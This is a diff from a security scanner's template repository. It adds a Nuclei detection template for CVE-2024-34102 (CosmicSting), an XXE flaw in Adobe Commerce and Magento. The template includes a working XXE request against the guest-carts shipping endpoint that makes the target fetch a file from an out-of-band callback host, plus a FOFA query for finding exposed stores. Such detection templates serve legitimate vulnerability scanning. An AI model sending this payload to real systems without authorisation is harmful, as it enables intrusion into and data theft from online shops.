Merge pull request #10130 from projectdiscovery/magento-cve2024
Create CVE-2024-34102.yaml (Adobe Commerce & Magento - CosmicSting)patch-4
commit
f468bdd5d4
|
@ -0,0 +1,41 @@
|
||||||
|
id: CVE-2024-34102
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Adobe Commerce & Magento - CosmicSting
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.
|
||||||
|
reference:
|
||||||
|
- https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md
|
||||||
|
metadata:
|
||||||
|
fofa-query: app="Adobe-Magento"
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2024,adobe,magento,xxe
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://{{interactsh-url}}/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the DNS Interaction
|
||||||
|
words:
|
||||||
|
- 'dns'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"message":'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "application/json"
|
Loading…
Reference in New Issue